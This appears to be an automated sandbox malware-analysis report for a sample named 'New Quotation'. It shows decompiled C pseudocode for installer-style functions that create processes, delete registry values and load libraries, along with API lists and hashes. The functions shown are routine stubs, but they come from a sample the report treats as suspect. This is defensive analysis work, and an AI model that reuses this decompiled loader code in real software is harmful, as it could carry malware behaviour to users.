                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401bb7
                                                                                                                                                                                          0x00401bb9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401bbf
                                                                                                                                                                                          0x00401bbf
                                                                                                                                                                                          0x00401bc2
                                                                                                                                                                                          0x00401bc9
                                                                                                                                                                                          0x00401bce
                                                                                                                                                                                          0x00401bd8
                                                                                                                                                                                          0x00401bdd
                                                                                                                                                                                          0x00401be2
                                                                                                                                                                                          0x00401be6
                                                                                                                                                                                          0x00402a94
                                                                                                                                                                                          0x00402c2a
                                                                                                                                                                                          0x00402c2d
                                                                                                                                                                                          0x00402c33
                                                                                                                                                                                          0x00402c33
                                                                                                                                                                                          0x00401bb9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401bb5
                                                                                                                                                                                          0x0040238a
                                                                                                                                                                                          0x00402397
                                                                                                                                                                                          0x00402398
                                                                                                                                                                                          0x0040239d
                                                                                                                                                                                          0x0040239d
                                                                                                                                                                                          0x00402c35
                                                                                                                                                                                          0x00402c39

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00401C0B
                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
                                                                                                                                                                                            • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                                                                                            • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll,00000000), ref: 00406779
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Global$AllocFreelstrcatlstrlen
                                                                                                                                                                                          • String ID: Call
                                                                                                                                                                                          • API String ID: 3292104215-1824292864
                                                                                                                                                                                          • Opcode ID: 52fc7f4bba199dd755adce2563ca841cd078fe1cbc178577cb316ce9b26f1339
                                                                                                                                                                                          • Instruction ID: 7c0f58a685d1fc6dd3685da305ee1819882fb4420ac17dc2787245939102450a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 52fc7f4bba199dd755adce2563ca841cd078fe1cbc178577cb316ce9b26f1339
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B21D872904210EBDB20AFA8EE84A5E73B4EB04715755063BF552F72D0D7B8AC414B9D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 69%
                                                                                                                                                                                          			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x434f30;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x433eec =  *0x433eec + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0); // executed
					}
				}
				return 0;
			}











                                                                                                                                                                                          0x0040138a
                                                                                                                                                                                          0x004013fa
                                                                                                                                                                                          0x0040139b
                                                                                                                                                                                          0x004013a0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004013a2
                                                                                                                                                                                          0x004013a3
                                                                                                                                                                                          0x004013ad
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401404
                                                                                                                                                                                          0x004013b0
                                                                                                                                                                                          0x004013b7
                                                                                                                                                                                          0x004013bd
                                                                                                                                                                                          0x004013be
                                                                                                                                                                                          0x004013c0
                                                                                                                                                                                          0x004013c2
                                                                                                                                                                                          0x004013b9
                                                                                                                                                                                          0x004013b9
                                                                                                                                                                                          0x004013ba
                                                                                                                                                                                          0x004013ba
                                                                                                                                                                                          0x004013c9
                                                                                                                                                                                          0x004013cb
                                                                                                                                                                                          0x004013f4
                                                                                                                                                                                          0x004013f4
                                                                                                                                                                                          0x004013c9
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                          • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                          • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                                                                                                                          • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                                                                                                                                                                                          • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402434 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00402434(void* __ebx) {
				long _t7;
				void* _t10;
				void* _t14;
				long _t18;
				intOrPtr _t20;
				void* _t22;
				void* _t23;

				_t14 = __ebx;
				_t26 =  *(_t23 - 0x20) - __ebx;
				_t20 =  *((intOrPtr*)(_t23 - 0x2c));
				if( *(_t23 - 0x20) != __ebx) {
					_t7 = E00402E64(_t20, E00402DA6(0x22),  *(_t23 - 0x20) >> 1); // executed
					_t18 = _t7;
					goto L4;
				} else {
					_t10 = E00402DE6(_t26, 2); // executed
					_t22 = _t10;
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t18 = RegDeleteValueW(_t22, E00402DA6(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t18 != _t14) {
							goto L6;
						}
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}










                                                                                                                                                                                          0x00402434
                                                                                                                                                                                          0x00402434
                                                                                                                                                                                          0x00402437
                                                                                                                                                                                          0x0040243a
                                                                                                                                                                                          0x00402476
                                                                                                                                                                                          0x0040247b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040243c
                                                                                                                                                                                          0x0040243e
                                                                                                                                                                                          0x00402443
                                                                                                                                                                                          0x00402447
                                                                                                                                                                                          0x0040292e
                                                                                                                                                                                          0x0040292e
                                                                                                                                                                                          0x0040244d
                                                                                                                                                                                          0x0040245d
                                                                                                                                                                                          0x0040245f
                                                                                                                                                                                          0x0040247d
                                                                                                                                                                                          0x0040247f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402485
                                                                                                                                                                                          0x0040247f
                                                                                                                                                                                          0x00402447
                                                                                                                                                                                          0x00402c2d
                                                                                                                                                                                          0x00402c39

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 00402456
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040245F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseDeleteValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2831762973-0
                                                                                                                                                                                          • Opcode ID: 19a3175f2dce71721c03d1e683778d637cb2f6925824b573f65edcc95b2fc0ba
                                                                                                                                                                                          • Instruction ID: 30df5d2aec36195d54007c6df5f336708121daf1b93815cec1e8c6dbc8099d71
                                                                                                                                                                                          • Opcode Fuzzy Hash: 19a3175f2dce71721c03d1e683778d637cb2f6925824b573f65edcc95b2fc0ba
                                                                                                                                                                                          • Instruction Fuzzy Hash: 22F0C232A00120EBDB11ABB89B4DAED72A8AF84314F15443BE141B71C0DAFC5D01866D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405672 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 50%
                                                                                                                                                                                          			E00405672(signed int __eax) {
				intOrPtr _v0;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t12;

				_t11 =  *0x434f28;
				_t10 =  *0x434f2c;
				__imp__OleInitialize(0); // executed
				 *0x434fc0 =  *0x434fc0 | __eax;
				E004044E5(0);
				if(_t10 != 0) {
					_t12 = _t11 + 0xc;
					while(1) {
						_t10 = _t10 - 1;
						if(( *(_t12 - 4) & 0x00000001) != 0 && E00401389( *_t12, _v0) != 0) {
							break;
						}
						_t12 = _t12 + 0x818;
						if(_t10 != 0) {
							continue;
						} else {
						}
						goto L7;
					}
					 *0x434f8c =  *0x434f8c + 1;
				}
				L7:
				E004044E5(0x404);
				__imp__OleUninitialize();
				return  *0x434f8c;
			}







                                                                                                                                                                                          0x00405673
                                                                                                                                                                                          0x0040567a
                                                                                                                                                                                          0x00405682
                                                                                                                                                                                          0x00405688
                                                                                                                                                                                          0x00405690
                                                                                                                                                                                          0x00405697
                                                                                                                                                                                          0x00405699
                                                                                                                                                                                          0x0040569c
                                                                                                                                                                                          0x0040569c
                                                                                                                                                                                          0x004056a1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004056b2
                                                                                                                                                                                          0x004056ba
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004056bc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004056ba
                                                                                                                                                                                          0x004056be
                                                                                                                                                                                          0x004056be
                                                                                                                                                                                          0x004056c4
                                                                                                                                                                                          0x004056c9
                                                                                                                                                                                          0x004056ce
                                                                                                                                                                                          0x004056db

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 00405682
                                                                                                                                                                                            • Part of subcall function 004044E5: SendMessageW.USER32(00010442,00000000,00000000,00000000), ref: 004044F7
                                                                                                                                                                                          • OleUninitialize.OLE32(00000404,00000000,?,00000000,?), ref: 004056CE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeMessageSendUninitialize
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2896919175-0
                                                                                                                                                                                          • Opcode ID: 373f90d4a1babe4f1a04baa381ba9309e44634cfc63d647d34b32aa976a59a0d
                                                                                                                                                                                          • Instruction ID: 6be4ff692d487ef8b3e25caebddd25c5d55207980f196ef2193ccf2f8785d180
                                                                                                                                                                                          • Opcode Fuzzy Hash: 373f90d4a1babe4f1a04baa381ba9309e44634cfc63d647d34b32aa976a59a0d
                                                                                                                                                                                          • Instruction Fuzzy Hash: B3F0F0765006009AE6115B95A901BA677A8EBD4316F49883AEF88632E0CB365C418A1C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$EnableShow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1136574915-0
                                                                                                                                                                                          • Opcode ID: dc6c04349ba6d228002943a8c0baf5b02fcea73b120ed6c720f8467004a60d34
                                                                                                                                                                                          • Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
                                                                                                                                                                                          • Opcode Fuzzy Hash: dc6c04349ba6d228002943a8c0baf5b02fcea73b120ed6c720f8467004a60d34
                                                                                                                                                                                          • Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405B20 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00405B20(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x430270->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x430270,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                                                                                                                          0x00405b29
                                                                                                                                                                                          0x00405b49
                                                                                                                                                                                          0x00405b51
                                                                                                                                                                                          0x00405b56
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405b5c
                                                                                                                                                                                          0x00405b60

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,00000000,00000000), ref: 00405B49
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405B56
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3712363035-0
                                                                                                                                                                                          • Opcode ID: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                                                                                                                                                                                          • Instruction ID: 0547baa0b497a95b6ed0e8f273b1969b1ac2c9598ef2001c301bcde660c6e2d6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3EE092B4600209BFEB10AB64AE49F7B7AACEB04704F004565BA51E61A1DB78E8158A78
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00401573(void* __ebx) {
				int _t4;
				void* _t9;
				struct HWND__* _t11;
				struct HWND__* _t12;
				void* _t16;

				_t9 = __ebx;
				_t11 =  *0x433ed0; // 0x1044e
				if(_t11 != __ebx) {
					ShowWindow(_t11,  *(_t16 - 0x2c)); // executed
					_t4 =  *(_t16 - 0x30);
				}
				_t12 =  *0x433ee4; // 0x10448
				if(_t12 != _t9) {
					ShowWindow(_t12, _t4); // executed
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t16 - 4));
				return 0;
			}








                                                                                                                                                                                          0x00401573
                                                                                                                                                                                          0x00401573
                                                                                                                                                                                          0x00401581
                                                                                                                                                                                          0x00401587
                                                                                                                                                                                          0x00401589
                                                                                                                                                                                          0x00401589
                                                                                                                                                                                          0x0040158c
                                                                                                                                                                                          0x00401594
                                                                                                                                                                                          0x0040159c
                                                                                                                                                                                          0x0040159c
                                                                                                                                                                                          0x00402c2d
                                                                                                                                                                                          0x00402c39

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ShowWindow.USER32(0001044E,?), ref: 00401587
                                                                                                                                                                                          • ShowWindow.USER32(00010448), ref: 0040159C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ShowWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1268545403-0
                                                                                                                                                                                          • Opcode ID: b3f40a1d3e3a3dde960193cdce1f04755895f92ce13450372c8703cd9cac8f58
                                                                                                                                                                                          • Instruction ID: a156d7c756385a3c588793d51facb92f34767ed8181f20582b2048d309791e4b
                                                                                                                                                                                          • Opcode Fuzzy Hash: b3f40a1d3e3a3dde960193cdce1f04755895f92ce13450372c8703cd9cac8f58
                                                                                                                                                                                          • Instruction Fuzzy Hash: 25E04F76B101149BCB05DFA8ED908AEB3A6EB84311314483BE502B3290D675AD048B18
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040690A Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0040690A(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E0040689A(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                                                                                                                                          0x00406912
                                                                                                                                                                                          0x00406915
                                                                                                                                                                                          0x0040691c
                                                                                                                                                                                          0x00406924
                                                                                                                                                                                          0x00406930
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406937
                                                                                                                                                                                          0x00406927
                                                                                                                                                                                          0x0040692e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040693f
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                                                                                                                            • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                                                                                                                            • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                                                                                                                                                                            • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2547128583-0
                                                                                                                                                                                          • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                                                                                          • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
